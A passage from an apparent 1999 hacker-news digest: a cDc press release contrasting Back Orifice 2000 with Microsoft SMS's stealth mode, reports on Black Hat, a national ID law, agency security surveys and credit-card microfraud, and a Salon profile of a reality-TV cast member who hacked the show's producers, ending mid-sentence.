by omega The cDc, writers of BO2K, have publicly challenged Microsoft to voluntarily recall all copies of its Systems Management Server network software and have requested the AV industry to respond with signature scanning for SMS files. The premise for this challenge is that Microsoft has labeled Back Orifice 2000 a malicious tool. cDc claims that if BO2K is malicious then SMS must also be, by definition, malicious. Both programs do the exact same thing and have almost identical feature sets. The Cult of the Dead Cow http://www.cultdeadcow.com/news/pr19990719.html ______________________________________________________________________ _ _ BACK ORIFICE 2000 ((___)) BACK ORIFICE 2000 show some control [ x x ] show some control \ / (' ') (U) ________________________ http://www.bo2k.com/ ________________________ FOR IMMEDIATE RELEASE FOR IMMEDIATE RELEASE Press Contact: The Deth Vegetable cDc Minister of Propaganda veggie@cultdeadcow.com DON'T WORRY WINDOWS USERS, EVERYTHING WILL BO2K [July 19th, San Francisco] The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft Corporation to voluntarily recall all copies of its Systems Management Server network software. In addition, cDc calls for the antivirus industry to respond with signature scanning for SMS files. "Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to Do-What-We-Say-Not-What-We-Do? Microsoft evidently dislikes our new tool so much that they've taken to complaining about one of its key features. We're talking about Back Orifice 2000, and the feature in question is its stealth mode. Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their primary evidence is BO2K's stealth feature, which gives you the option to run the server on the remote machine without it being evident to anybody sitting at that machine. In fact, here's what they're saying right now on the Microsoft Security Advisor website: BO2K is a program that, when installed on a Windows computer, allows the computer to be remotely controlled by another user. Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect. http://www.microsoft.com/security/bulletins/bo2k.asp Now, we concede that on its face, this sounds like a valid criticism. Being able to operate a remote admin tool without the person at the other end knowing that it's running on the machine seems downright devious. (Keep in mind that BO2K's stealth feature is an OPTION, which is in fact disabled by default.) Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to brand it a hacker tool with no redeeming social value. But then, what are we to make of Systems Management Server (SMS)? SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical stealth feature. As a matter of fact, they explain this feature in a Word document available from the Microsoft website: Security Of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the most "dangerous" in terms of security. Once an administrator is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it. Thus, it is important to understand the different security options available and also to understand the legal implications of using some of them in certain jurisdictions." Visible and Audible Indicators It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of this spectrum to the other. When configuring the options available in the Remote Tools Client Agent properties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted." http://www.microsoft.com/smsmgmt/techdetails/remote.asp Notice that? Microsoft's own tool has the same evil capability as BO2K. Now, Microsoft did not invent surreptitious desktop surveillance; there are other products on the market that perform these functions. Microsoft is just the largest supplier of the technology, as SMS comes bundled with each copy of Back Office. Why is it that Microsoft can offer a tool having this illegitimate functionality without any moral qualms, but when WE do it, they throw a hissy fit? Well... we have a hunch. "Microsoft wants to keep everybody talking about the evil software from us crazy computer hackers. So they paint BO2K as a dangerous application with no constructive uses," says Reid Fleming (cDc). "We beg to differ." BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing to categorize as such. So in order to convince the public that BO2K is a solely destructive tool, Microsoft is forced to criticize the tool's feature set. Evidently whoever dreamed up this press strategy was unaware of Systems Management Server and its stealth feature. Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile, BO2K is free. (It's also open source, and better constructed any way you measure it: size, efficiency, functionality, security.) Maybe this is just another example of Microsoft's alleged anticompetitiveness? "BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used either responsibly or irresponsibly," says Count Zero (cDc). "For Microsoft to claim that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has nearly the same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it." Regardless of their motivations, Microsoft is selling software which does many of same things as Back Orifice 2000, including the pernicious ability to run hidden from the user. And if stealth mode is what makes BO2K a malicious program, then Microsoft's Systems Management Server is a malicious program too. Consequently, we challenge Microsoft to recall all copies of the SMS administration tool, because its featureset contains stealth capability. This feature clearly illustrates that their software has no legitimate use. Furthermore, we urge all antivirus vendors to include signatures for SMS in their scanner utilities. Back Orifice 2000 is available for download free of charge from http://www.bo2k.com/. .......................................................................... APPENDIX Equally hypocritical quotes from Microsoft about Back Orifice: "Users who are tricked into getting this thing installed on their system are vulnerable to the attacker, who can then do anything that the victim can do -- move the mouse, open files, run programs, etc. -- which is little different from what legitimate remote-control software can do. Back Orifice, however, is designed to be stealthy and evade detection by the user." "In fact, it really ends up doing bad things -- that’s what a Trojan horse does. Back Orifice falls into that category because it is intentionally designed to hide itself from detection. The creators claim that this is a useful administration tool, but it doesn’t even prompt people when it installs itself on the system. It doesn’t warn them that it’s getting installed. And, once it’s installed, it makes the system available to other people on the Internet. That is a malicious act." "It’s incomprehensible why a tool like this would be created. [...] [T]here’s no purpose for this tool other than harming actual users of software products." -- Jason Garms, lead product manager for Windows NT security Microsoft's prefabricated interview, 8-July-1999 .......................................................................... The CULT OF THE DEAD COW (cDc) is the most influential group of hackers in the world. Formed in 1984, the cDc has published the longest running e-zine on the Internet, swallowed swords, made waffles, and so on. For more background information, journalists are invited to check out our Medialist at http://www.cultdeadcow.com/news/medialist.htm. Cheerio. "Microsoft", "Windows", "Systems Management Server", "Word", and "Back Office" are all trademarks of the Microsoft Corporation. Blah blah blah, this is giving me a headache. "cDc. It's alla'bout style, jackass." @HWA 18.0 BlackHat Insiders Want to Quit Security Biz ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid While Defcon made it into the popular press and gathered all the attention The BlackHat Briefings is where a lot of the security industry traded secrets. Infoworld's Stuart McClure and Joel Scambray give a pretty good overview of the goings on at the conference and describe a growing sentiment within the industry that you can't secure the world. InfoWorld http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/29/o03-29.44.htm July 19, 1999 (Vol. 21, Issue 29) SECURITY WATCH BY STUART McCLURE & JOEL SCAMBRAY Black Hat conference survives a denial-of-service attack, but will it outlast attrition? The Security Watch team writes to you this week from the ever-expanding concrete facades of Las Vegas, where we were in attendance at the third annual Black Hat Briefings USA conference from July 7 through July 8. The original concept behind the Black Hat conference was to "meet the enemy," where corporate types could rub elbows with the glitterati of the hacker set, including such notables as Simple Nomad of the Nomad Mobile Research Center (www.nmrc.org) and Dr. Mudge of L0pht (www.l0pht.com). The event has evolved into a general meeting of the minds among security practitioners of all types, from public-sector managers to professional consultants. Our feelings can best be summed up by the offhand comment of Windows NT security guru Dominique Brezinski, in his talk at the finale of the first day of presentations: "My life is miserable and pathetic, and I want to get out of security soon." Although the remark was mostly intended as a self-deprecating jest, it reflected the undercurrent of frustration that many speakers echoed throughout the conference: Despite all of the work being done in the security field, the same old problems never seem to get solved. These recurring issues include the endemic lack of security expertise in the market today, the Achilles' heel of poor password choices, and an ever-expanding list of commercial software bugs that are becoming impossible to fix. Despite the formidable intellectual talent assembled at Black Hat, the general response to some of these problems is to throw up the hands and say, "I give up." For example, Brezinski gave a fascinating discussion of the implications of NT and Solaris' shared-code search path for creating a trusted forensic toolkit CD-ROM, but he concluded his talk by noting that an attacker sophisticated enough to make kernel modifications would be impossible to defeat. Here are two other good examples: Security legend Bill Cheswick's printed materials yawned that "this security stuff is all the same. ... From a security viewpoint, there is little new about the Internet." And cryptography expert Bruce Schneier's ruminations included, "A secure computer is one that has been insured," which means you should get used to the notion that your system will be compromised. We can understand Cheswick's sentiments, because he has been one of the leading lights in security for the past 30 years, but it was a bit troubling to hear the "next generation" of the security avant-garde openly proclaiming the need to seek more serene pastures. Pessimism aside, there were still a great deal of interesting topics covered by the Black Hat speakers. Some highlights included Mudge's technical outline of L0pht's new program, AntiSniff, which remotely detects promiscuous-mode network interfaces, and Simple Nomad's release of Pandora 4 with a functional version of its NetWare Level 3 packet-signing exploit. Our company, Ernst & Young, gave a similar demonstration on NT of "passing the hash" to circumvent the NT challenge/response log-on. The original idea for this type of attack was proposed on NTBugtraq years ago but was never publicly proved. And despite the gloom expressed in some of their thoughts, all of the speakers showed great patience and perseverance during the incessant testing of the Venetian hotel's fire-alarm system throughout the two-day conference. In the end, Black Hat's spirit proved resistant to this denial-of-service attempt. Of course, a lot of the good information coming out of Black Hat doesn't appear in any official program but is gleaned in the corridors outside the conference hall during breaks in the program. We've done our best to capture the essence of Black Hat, but a lot of great dialogue was left on the cutting room floor. The next best thing to being there is purchasing the full conference, including a video of the presentations in MP3 format, at www.blackhat.com. Meanwhile, send your thoughts on addressing security symptoms vs. problems to security_watch@infoworld.com. Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environments for the past nine years. Copyright (c) 1999 InfoWorld Media Group Inc. @HWA 19.0 Attrition Closes Down Negation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Staff The Attrition.org staff has decided to stop updating the Negation section of their web site. The Negation section covers the activity of John Vranesevich of AntiOnline. The Attrition staff claim that they have accomplished what they set out to do which was to prove beyond a reasonable doubt that AntiOnline and John Vranesevich are a fraud. The Attrition statement says that they have also proven John Vranesevich guilty of libel, repeated copyright violation, paying people to break into systems, idle threats to stifle competition, and serious errors in supposed "factual news". The Negation section will remain posted for all to see, it will just no longer be updated. Negation http://www.attrition.org/negation/ @HWA 20.0 ISS Offers Cracking Tools ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Just like any tool these have both good and bad uses. ISS has announced three prototype tools, Telephony Scanner, a wardailing program, Attacker Tracker, a log file analysis tool, and SQL Cracker, for auditing SQL passwords. Free demos are available. ISS Protoworx http://xforce.iss.net/protoworx/ @HWA 21.0 IBM Researching Proactive Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The proactive Security project at IBM is producing some interesting results. There are white papers and demos available. Definitely a site worth looking at. IBM http://www.hrl.il.ibm.com/proactive/ <- lots of interesting postscript papers here 22.0 InET Issue #3 ~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by GothstaiN Good news for the non-english crowd. InET Magazine issue #3 has been released and it only comes in Spanish. Intrusos http://www.intrusos.cjb.net @HWA 23.0 National ID Card Law Set to be Enacted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid In an effort to fight illegal immigration US Representative Lamar Smith, from San Antonio, Texas, has proposed that your social security number and possibly microchips encoded with your fingerprints and other personal data be a mandatory part of your drivers license. At a hearing Thursday, the House Immigration subcommittee will debate the future of modified driver licenses, which has been labeled by some as a "national ID card." Wired http://www.wired.com/news/news/politics/story/20881.html House Immigration subcommittee http://www.house.gov/judiciary/sub106.htm Your License or Your Life by Declan McCullagh 3:00 a.m. 22.Jul.99.PDT WASHINGTON -- If Representative Lamar Smith has his way, your driver's license will soon sport your Social Security number, whether you like it or not. It may also include microchips encoded with your fingerprints and other personal data. Government agencies will no longer accept as identification licenses that don't meet the new standards. Smith, a Republican from San Antonio, is firmly convinced the new features will reduce immigration. Not only is he doggedly opposed to illegal immigration, he wants to reduce legal immigration, insisting that low-skilled workers compete with US citizens for entry-level jobs. See also: Your Driver License, For Sale? http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/politics/story/20435.html At a hearing Thursday, the House Immigration subcommittee will debate the future of modified driver licenses, which detractors derisively call a "national ID card." Since Smith heads the subcommittee, his opponents have had an uphill battle. Making their fight even more difficult is the fact that Congress approved the new license rules in 1996. Civil liberties and privacy groups are doggedly attempting to repeal the law before it takes effect next year. So far, they've had little success. It's true that in 1998 they managed to get the Transportation Department to delay following through on regulations for a year. But that temporary setback expires in October 1999. They had no luck in inserting a flat-out repeal in a transportation spending bill last month. "We're urging Congress to reverse course on national IDs," said Greg Nojeim, legislative counsel for the American Civil Liberties Union. "Too many proposals to combat illegal immigration instead limit the rights and freedoms of Americans. We don't need a national ID card to be the legacy of efforts to keep undocumented people from working." The ACLU is part of a coalition with other liberal groups, such as the Electronic Frontier Foundation and Electronic Privacy Information Center. But the alliance also includes arch-conservative organizations: the Eagle Forum, the Free Congress Foundation, and Americans for Tax Reform. The organizations found common ground in what they uniformly believe is a serious threat to privacy. "Proposals for a national ID have been consistently rejected in the United States as an infringement of personal liberty," said a recent coalition letter urging Congress to nix the current law. "We care about this hearing because there are other members that are receptive to privacy concerns. While Lamar Smith is on the other side, other members need to hear what's going on," said Lori Cole, a spokesman for the Eagle Forum's office in Washington. For his part, Smith angrily denies that he's Big Brother incarnate in a note he posted on his Web site: "I do not support a national ID card and don't know anyone who does." In response to the 1996 law that requires "security features" in licenses, the Department of Transportation in June 1998 proposed that states must encode SSNs (and possibly digitized fingerprints) onto drivers licenses. After October 2000, the feds will require these new licenses if people want to use any government service, board an airplane, be eligible for Medicare -- in other words, live a normal life and do the everyday things most Americans take for granted. The DOT will be allowed to proceed in October 1999, unless Congress acts. "The states are concerned that they will be legally obligated to encode information in drivers licenses and collect Social Security numbers," says one Hill source. The National Conference of State Legislators and the National Association of Counties have joined the coalition. They sent a letter to House Speaker Dennis Hastert on 30 June urging Congress to repeal Section 656 of the Illegal Immigration Reform and Immigrant Responsibilities Act of 1996. Another letter signed by six Congressmen urges colleagues to support a repeal measure -- the Privacy Protection Act -- introduced by Representative Ron Paul (R-Texas). @HWA 24.0 Local Agencies Not Concerned About Computer Intrusions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Carole A report released by the Emergency Response and Research Institute paints a disturbing picture. The report claims that many local, county and state agencies have little or no fear of illegal data access. While most respondents said that they have dealt with Viruses, 30% claimed that computer tampering was of little or no concern to them. Someone needs to wake these people up. Civic http://www.civic.com/news/1999/july/civ-virus-7-21-99.html Emergency Response and Research Institute http://www.emergency.com/ Survey Finds Local Agencies Hit Hard by Viruses; Not Worried About Hacking July 21, 1999 An overwhelming majority of local, county and state agencies have been the victims of computer viruses, but few are worried about being hacked, according to a recent survey by the Emergency Response and Research Institute, a public safety consulting group. The ERRI report found that nearly 83 percent of 175 agencies that participated in the survey had dealt with a computer virus, indicating a possible lack of effective anti-virus software in use or unsafe computing practices by respondents. Although 63 percent of the respondents called computer "hacking/cracking" a problem, about one-third did not view the issue as a concern at all. "This is the first survey that we know of its kind that contacted, city, county and state agencies on this issue," said Clark L. Staten, executive director of ERRI. "We would like to take it more in-depth and broaden it to be [more] statistically significant.... It's a problem that is not receiving recognition." ERRI analysts, who received the completed surveys during May and June, also noted that more than 94 percent of those surveyed used a World Wide Web site to communicate with the public. Far fewer (59 percent) reported using e-mail to respond to public comments or complaints. Staten would not name specific locations that participated because they had been promised anonymity, but he said most of the respondents were emergency agencies from municipalities across the United States, including fire departments, university security departments, state emergency management agencies and emergency medical services departments. Six agencies from Canada also responded, he said. ERRI, based in Chicago, was founded to provide solutions to the emergency response and government community. More information is available at www.emergency.com. -- Dan Caterinicchia (danc@civic.com) @HWA 25.0 Microfraud Becomes Big Deal ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Still think the Internet is a safe place to conduct business? Here is an eye opening article that takes a look at what it calls 'microfraud'. Stealing a little money from a lot of people. The idea has been around for years but is only now coming to fruition with the unlimited reach and anonymity of the internet. Scientific American http://www.sciam.com/1999/0899issue/0899cyber.html HOW TO STEAL MILLIONS IN CHUMP CHANGE It used to be a joke: a computer can make a mistake in a fraction of a second that would take an army of mathematicians working with pencil and paper 100 years to make. For 900,000 people whose credit cards apparently suffered fraudulent charges in a single computer-based scam, this old saw morphed into an unpleasant reality. The Federal Trade Commission (FTC) is trying to recover as much as $45 million from a handful of people who used modern technology to flood outdated security precautions. In late 1998 the group accounted for 4 percent of all the Visa chargebacks (in which a merchant's account is debited for the amount of a transaction) in the world. Victims did not have to use their cards on the Web to be hit with charges. They didn't even have to use their cards at all. It would have taken about three years for a dishonest restaurant employee or store clerk working 24 hours a day just to fill out and submit the bogus transactions that FTC investigators ascribe to Kenneth H. Taves, his wife, Teresa, and their associates. The group, they say, set up a series of companies that processed Visa charges for adult Web sites and used the card numbers from those transactions plus others made up by a simple computer program to charge people for services that never existed. (At press time, Taves was in jail on contempt-of-court charges after disobeying an order to turn over records and to repatriate about $6 million from accounts in the Cayman Islands. His trial is scheduled for September 28.) The essence of the scam was an updated version of the hoary computer-crime legend in which a clever programmer siphons fractional pennies from millions of bank accounts and ends up rich with no one the wiser. Here each fraudulent charge was typically $19.95, an amount unlikely to alarm a harried consumer who might not remember every last purchase on a statement. The transactions also clearly passed under the radar of Visa's fraud-detection algorithms. Although Visa and its member banks have been notably silent about the role of their security measures in the debacle, sources suggest that antifraud efforts have largely been geared to prevent smaller numbers of high-ticket thefts. Indeed, the relatively small amount of each bill involved aggrieved customers in a financial catch-22: banks usually will go back only two months when reversing disputed charges, but $38.90 is comfortably less than the $50 limit above which U.S. financial institutions are required by law to compensate customers for fraudulent credit-card transactions. To make matters more difficult, Taves and his cohorts had an obvious excuse for disputed charges in the nature of the product they were selling: it was only natural, they reportedly faxed at least one bank, that people would want to disavow subscriptions to Web sites selling pornographic pictures. Although it provided a convenient cover story, the porn connection may also have been Taves's undoing, says John G. Faughnan, a physician and software developer whose Web page is the best source of information on the scam. Many of the more than 200 victims who contacted him found their jobs or their marriages in jeopardy, so they had much more incentive to track down the perpetrator than just recovering the $20 to $100 they were bilked out of. Faughnan acknowledges that his own attempts to navigate the financial bureaucracy and get a refund cost far more than the money lost. Specific shortcomings in credit-card-processing procedures appear to have made this scam even more effective than it might otherwise have been. The tricksters apparently concentrated their charges outside the U.S., where most banks do not verify the billing address--or in some cases even the expiration date--of the card being charged. Because there was no shipping address involved, the recurring charges were generally treated like restaurant or store transactions, in which a merchant has the buyer's card in hand and a signature on a charge slip. All the thieves needed was a valid number--not even a name. So what does this mean for the little slabs of plastic that make our lives so much more convenient? Although the wide availability of cheap processing power has made the system vulnerable to unscrupulous merchants for a decade or more, it may be the advent of a huge array of intangible products for sale, across an essentially untraceable network, that opens the floodgates of microfraud. A 20-seat restaurant or a tiny boutique that claimed $4 million a month in business would be an obvious target for investigation. A digital storefront, in contrast, could house a dozen fast PCs delivering millions of dollars' worth of products from a locked room the size of a journalist's office, or it could conceal a ring of high-tech bandits stealing just a little money from a lot of people. Telling the difference between the two would require more scrutiny of both digital buyers and sellers, perhaps to the point of making e-commerce less ravishingly attractive than it has lately become. Furthermore, as long as a consumer's cost in time and money for reversing a fraudulent transaction exceeds the amount to be recovered, no one in the chain of electronic commerce has a significant incentive to adopt measures (such as the long-stalled Secure Electronic Transaction standard or various forms of digital cash) that would make such scams less likely. In fact, Faughnan points out, many sellers of digital content can profit from opening their Web sites to users of false credit cards--even in the unlikely event of a chargeback, the marginal cost of the extra bits that were delivered is negligible. Ultimately, technologists will undoubtedly introduce security countermeasures--perhaps in the form of the cryptography software that governments still seem bent on keeping away from whoever hasn't gotten around to downloading it yet. In the meantime, the ability of individual victims (on the Internet, at least) to alert thousands or millions of their peers seems to be the only game in town. --Paul Wallich @HWA 26.0 China Arrests One After Posting to Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue A Chinese engineer has been arrested on charges of leaking state secrets after he posted secrets about a new warplane to an Internet bulletin board. The message he posted allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the city of Chengdu. Nando Times http://www.nandotimes.com/technology/story/0,1643,72624-114802-815595-0,00.html Chinese engineer accused of posting security secrets online Copyright © 1999 Nando Media Copyright © 1999 Associated Press BEIJING (July 21, 1999 1:04 p.m. EDT http://www.nandotimes.com) - A Chinese engineer has been arrested on charges of posting secrets about a new warplane to an Internet bulletin board, a newspaper reported Wednesday. Authorities tracked down the engineer after the article posted in May spread to other Internet sites, the state-run China Business Times reported. The newspaper identified the engineer only by his surname, Guo. The article he published allegedly touched on secrets about a new fighter plane that he learned about while working at a research institute in the southwestern city of Chengdu, the newspaper said. The newspaper alleged that Guo posted the article to show off a specialist's knowledge of military affairs. Prosecutors in Chengdu decided a few days ago to arrest Guo on charges of leaking state secrets, the newspaper said. @HWA 27.0 The Truth About Abe - MTV "Punk Hacker" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by tweety Back in February HNN asked if anyone knew anything about Abe, the "punk hacker". Well now we do. Salon Magazine has posted a rather long expose on Abe's exploits. The article describes how he used the original Back Orifice to break into the producer's computers and then used the information he found there to not only get on the show but learn inside information about other cast members. Evidently all it takes to be an MTV 'hacker' is to use Back Orifice. Salon http://www.salon.com/ent/feature/1999/07/21/mtv_hacker/index.html HNN Archive for February 11, 1999 http://www.hackernews.com/arch.html?021199 {Hacking toward Bethlehem} Abe Ingersoll, a former punk hacker and infamous "Road Rules" cast member, reflects on his ill-fated 15 minutes. - - - - - - - - - - - - By Jonathan Vankin July 21, 1999 | Abe Ingersoll is not the type to hit a lady -- even if she is kicking his ass on national television. So when a tiny woman named Gladys smacked him with a roundhouse left hook, Abe reacted stoically. The punch landed squarely on his jaw, sending him sprawling. Gladys then pounced, raining blow after blow on his back and shoulders. The entire beating unfolded before rolling MTV video cameras, for later viewing by an audience of millions. But Abe did nothing to defend himself other than ball up and yell at her to knock it off. Abe, a compact, spiffy-looking 18-year-old, was a cast member of "Road Rules: Latin America" -- a 15-week-long installment of MTV's peripatetic spinoff from the rusty but reliable documentary show, "The Real World." (Abe's "Road Rules" episodes, which first aired earlier this year, will likely be rerun in the fall.) When the self-professed "punk hacker kid" decided to audition for the show, it occurred to him that he might upgrade his odds of making the cast by hacking into the network of the show's production company, Bunim/Murray. He was right. Included in his haul were transcripts of previous interviews with prospective cast members, which gave him an inside track on what the producers were looking for. "Actually it's not even hacking because it's so straightforward," Abe tells me as we sit in his Venice, Calif., apartment, several months after the fact. A well-scuffed surfboard leans against the wall beside Abe's home-built, Linux-loaded PC. "They had this information shared to the world. Anybody could just come and find it. Cheap production company, cheap T-1 connecting a LAN network to the Internet; what could possibly be at the other end of that?" A whole mess of trouble, as it turns out. In short, Abe uncovered biographical insights on cast members from previous "Road Rules" excursions, several of whom dropped by for a "spontaneous" on-air visit during the Latin America shoot. He then used said info for nefarious purposes that inadvertently aroused the wrath of Gladys. So she beat him up. All in all, a pretty embarrassing 15 minutes of fame for a kid from Peoria. For those not part of MTV's crucial yearning-adolescent demographic, here's the high concept behind "Road Rules": Find six attractive, outspoken, go-for-it young adults between the ages of 18 and 24, set them up inside an RV, put them on the road in an exotic locale, and then sit back and let the zaniness begin. It's so stupid it's perfect. A camera crew and production staff follow the young people around day and night, videotaping their every nervous tic, angst-ridden confessional and shouting match. Abe's hack was a classic case of the chickens coming home to roost. Partners Jon Murray and Mary-Ellis Bunim's shows are carefully stocked with sexy, flamboyant and ever-so-slightly dysfunctional post-adolescents. The archetype is Puck from "The Real World," an abrasive loudmouth whose temporary "family" gave him the boot. The "Road Rules" producers knew they were getting another bad-boy specimen with Abe -- they even labeled him "The Bad Guy" in on-air promo spots -- but he turned out to be more trouble than they'd counted on. "We knew we were taking a certain risk in choosing someone like Abe," says Murray, who learned of Abe's attack after the show had wrapped. "To some extent, that's what Abe is about." "Abe has tremendous charisma and he has unique experience," adds Bunim. "When we met him, we were excited that his back story didn't duplicate anyone else's. We didn't think a whole lot about the danger of casting someone like Abe. Maybe we should have. It's unnerving to feel that completely vulnerable." And what does Abe have to say for himself? He doesn't offer any excuses. But as we become acquainted, he does tell me that he saw "Road Rules" as an opportunity for useful peer-group therapy in the wake of his rather turbulent upbringing. The show was a means, he says, "to be reconnected with my generation." "As we see," he now admits, "that did not happen at all." Abe was the second-youngest of seven children -- six of them boys. Before he came along, his parents belonged to the Children of God, a roving religious cult that emerged from the Jesus People movement of the '60s. His parents deserted the sect after a few years but maintained an itinerant lifestyle. The Ingersoll clan was living in Twisp, Wash., in the basement of an Assemblies of God church, when Abe entered the world on March 19, 1980. Later, the family moved to a Mennonite commune in rural Illinois. On "Road Rules," Abe can be heard lamenting the rigors of growing up on welfare, mostly through the late '80s and early '90s. Abe's father, Lewis Ingersoll, an affable man who laughs easily and revels in the family's lore, downplays the hardships. "These kids always emphasize things that, to me, are kind of a distortion," he says. "I had another son who went to Yale. He wrote a story that was published in the paper about him and his older brother getting in a dumpster." And yet, as Ingersoll admits: "We did have a period of time when we went through dumpsters. But hell, the kids had more fun! Every dumpster we passed by, they'd want to stop and go through it!" The Ingersolls' marriage disintegrated in the late '80s. After bearing seven children, Abe's mother "switched teams," as Abe puts it. She and her partner got custody of the younger children, including Abe. He lived with his mother in De Kalb, Ill., but after a round of family counseling, he relocated to his father's home in Peoria, where he lived from 1994 to 1997. Abe was 12 when he first discovered computers, specifically a Toshiba laptop that his dad brought home, which was running an old version of DOS. Abe was a natural with computers. "I picked up the Toshiba, fired up Procomm Plus, and that was the end of it," he says. He started with dial-ups to local bulletin board systems. When a local ISP hooked up its T-1 line in late 1994, Abe discovered the Internet. "Of course I was their first customer," he says. With no money to buy better computer equipment, and under the influence of older hacker buddies he met while noodling around online, Abe soon dived into deeper waters. Using discarded credit-card receipts, he started ordering computer equipment from pay phones, having the merchandise overnighted to vacant houses. Before the shippers discovered the scam, he was long gone with the booty. Eventually, his older brother Chase ratted Abe out to his father, who turned his son in to the police. Abe confessed all. He was slapped with 18 months of probation and several hundred dollars in fines. After this incident, Abe's father was ready for him to move on. An uncle on his mother's side agreed to serve as Abe's new mentor and guardian. Abe relocated to Los Angeles, entered high school, dithered, dropped out by pulling what he calls "the Ferris Bueller trick" (back-dooring into the school's computers and wiping clean all records of himself). Abe was free, but he felt like he was missing out on something. So he figured he should cap his adolescence with a lunge at TV stardom. He decided to tough out the arduous "Road Rules" casting process -- which begins with 5,000 applicants -- to try to land a spot on the show. What Abe got into was, of course, a real-life variation on "EDtv," in which everyone's existence is quasi-scripted by unseen hands. "The big mindfuck of it all is that they control everything," Abe says of Bunim and Murray. "From how much money you have to where you're going to what you're doing. You have this set of parameters you have to work within to, like, 'have fun.' You're on 'The Truman Show.' You just happen to know it." "Basically you saw how mundane and silly a lot of it was," says Abe. "These two burned-out soap opera producers are now doing a show for MTV. They take thousands of hours of tape and make it into -- whatever you call it. It's pretty much a joke." (For the record: Bunim is a former soap opera producer; Murray came out of news and documentary production.) If Bunim and Murray were shocked that Abe hacked their system, the first line of Abe's application questionnaire should have been their first clue. Asked to "Describe your job," Abe wrote: "Full time systems analyst (aka punk hacker kid)." Bunim and Murray eventually lifted Abe's "punk hacker" wording for his cast bio on the Road Rules Web site. But they just didn't get it. Abe wasn't being cute with the hacking boast. He was being honest. The casting process started with a homemade tape in which Abe introduced himself to the producers and proved that he looked sharp on camera. A lengthy and repetitive series of interviews followed; they were conducted mostly by phone, but a few were held in the company's Van Nuys offices. It was during one of those sessions that an interviewer challenged him about the possibility of hacking the office computers. "They said, 'So, Abe, what have you seen in our computer system?' I just laughed because at that point I hadn't spent any time at all investigating stuff. I don't know if they didn't think it could happen or what. But when they offhandedly made a remark, it kind of stuck in my mind. Then I got bored one night and the next thing you know ..." He quickly discovered a significant security flaw in the Bunim/Murray network -- namely, that it had no security. The company was running various incarnations of Windows, which, according to Abe, contained gaping holes. Abe doesn't hang out or correspond much with the hacker community -- "I'm not a typical hacker!" he insists -- but he does read "bug reports," in which hackers list the flaws they've discovered in software programs and operating systems. Drawing on that information and several hours of trial and error, Abe found a point of entry. Then he made a quick stop at Cult of the Dead Cow, an active hacker site, where he downloaded a copy of Back Orifice, a "remote control" program that allows someone like Abe to operate a Windows 95 machine from any location via the Internet. With that capability, he was able to navigate the network and uncover a huge storehouse of Bunim/Murray documents and files. Most of it was eye-glazing stuff -- Excel spreadsheets, legalistic internal memos and other mulch he didn't care about. "It's like a vast empty void," he says. But he also found inside dope: transcripts of casting interviews, meticulous logs of videotapes describing every titter, jitter and palpitation of the characters recorded on tape, story outlines for half-hour episodes distilled from hundreds of hours of film time. This was Abe's pre-show education, his own private screening room. In typical exchanges, people were asked about their problems growing up, about their appetites for sex. One guy is asked if it's true that all men measure their penises. (His answer: I never have.) "In the interviews they cover this huge range of topics, but what it comes down to is the sex and the conflict," Abe observes. "That's basically what the show revolves around." Abe is probably right. I search through his archive for something, anything, of deeper interest to mankind, but I come up empty. For me, the sheer banality of it all is the most telling part. But Abe, half my age and far more idealistic, got his hackles up about the manipulative nature of the "Road Rules" experience. For that reason, he felt no compunction about using the information he gathered to take action. But instead of striking back at his Orwellian puppet masters with some sort of brilliant megaprank -- as he easily could have -- Abe used his insider knowledge to bag a babe. As the Latin America road trip got under way, Abe almost immediately filled the role of black sheep. The show portrayed him as a gadfly and a cad, whose idea of fun is to electronically eavesdrop on another cast member's intimate phone call to a girlfriend back home, while coolly plotting to seduce any female who catches his fancy. Abe wasn't secretive about his plans. On MTV's Web site, he's quoted reflecting on his experience: "If there was one thing that I was really 18 about, I said that I would get with all three girls ... but in the same respect I'm kind of, you know, what else is a horny young 18-year-old dude gonna do?" "The degree of that surprised me," says Abe's uncle, Jon Burdick, who guided Abe's move to California. "I knew he'd want to come across as the wild one. But he doesn't ever really mean to hurt anybody and he's surprised when he does. I think it's just the way Bunim/Murray wants to cut it, for the sake of ratings." Which brings us to the part of 